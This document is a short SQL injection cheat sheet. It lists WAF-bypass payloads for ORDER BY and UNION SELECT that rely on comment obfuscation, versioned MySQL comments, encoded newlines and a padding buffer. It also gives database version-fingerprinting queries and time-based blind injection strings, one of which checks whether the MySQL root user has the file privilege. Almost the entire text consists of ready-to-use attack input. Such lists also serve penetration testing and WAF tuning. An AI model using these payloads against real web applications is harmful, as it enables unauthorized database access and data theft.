bypass sql injection

1. +++ Order by, bypass WAF +++
2. 1] Null' order by 100--+
3. 2] ')group by 99-- -
4. 3] group/**/by/**/99%23%23
5. 4] +%0aorder%0aby%0a+
6. 5] +/*!42247order*//**//*!42247by*/+
7. 6] order by/**_**/1--
8. 7] /*!12345order*/+/*!12345by*/1--
9. 8] %')order by 1%23%23
10.  
11.  
12. +++ Union select buffer overflow, bypass WAF +++
13. 1] +uNIOn%23xxxxxxxxxxx%0aSELECT+
14. 2] +And+mod(29,0)+/*!50000UNioN*/+/*!50000SeLeCT*/+
15. 3] +AND+MOD(52,12)+/*!50000UNION/**_**/*/+/*!50000SELECT/**_**/*/
16. 4] +And .0union/**_**/distinctrow%23GearFourthXYXYXYXYXYXYXYXYXYXYXYXYXYXYXYXYXYXYXYXYXYXYXYXYXYXYXYXYXYXYXYXYXYXYXYXYXYXYXYXYXYXYXYXYXYXYXYXYXYXYXYXYXYXYXYXYXYXYXYXYXYXYXYXYXYXYXYXYXYXYXYXYXYXYXYXYXYXYXYXYXYXYXYXYXYXYXYXYXYXYXYXYXYXYXYXYXYXYXYXYXYXYXYXYXYXYXYXYXYXYXYXYXYXYXYXYXYXYXYXYXYXYXYXYXYXYXYXYXYXYXYXYXYXYXYXYXYXYXYXYXYXYXYXYXYXYXYXYXYXYXYXYXYXYXYXYXYXYXYXYXYXYXYXYXYXYXYXYXYXYXYXYXYXYXYXYXYXYXYXYXYXYXYXYXYXYXYXYXYXYXYXYXYXYXYXYXYXYXYXYXYXYXYXYXYXYXYXYXYXYXYXYXYXYXYXYXYXYXYXYXYXYXYXYXYXYXYXYXYXYXYXYXYXYXYXYXYXYXYXYXYXYXY%0aselect/**_**/distinctrow
17.  
18. +++ Print System +++
19. 1] @@version
20. 2] @@version_comment
21. 3] @@version_compile_os
22. 4] @@version_compile_machine
23. 5] version()
24.  
25. +++ Time Based HTTP Method POST +++
26. 1] admin' AND sleep(10);-- -
27. 2] ‘%2b(select*from(select(sleep(5)))a)%2b’
28. 3] and IF(SUBSTRING((select 1 from [guess_your_table_name] limit 0,1),1,1)=1,SLEEP(5),1)
29. 4] AND if (MID((SELECT file_priv FROM mysql.user WHERE user = 'root'),1,1) = 'Y', sleep(10), null)--